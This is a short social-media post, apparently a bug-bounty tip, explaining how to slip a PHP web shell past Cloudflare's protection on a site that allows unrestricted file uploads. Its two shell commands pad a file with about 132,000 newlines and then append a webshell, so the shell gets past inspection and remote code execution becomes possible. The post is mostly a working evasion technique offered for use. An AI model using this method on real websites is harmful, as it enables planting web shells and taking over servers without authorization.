Have you a Unrestricted file upload but the RCE is not possible due a cloudflare protection?
This cloudflare bypass works for me:

$python -c “print ‘\n’*132000” >file.php
$cat webshell.php >> file.php

#CyberSecurity #CyberAttack #bugbounty #bugbountytips #python #100DaysOfCode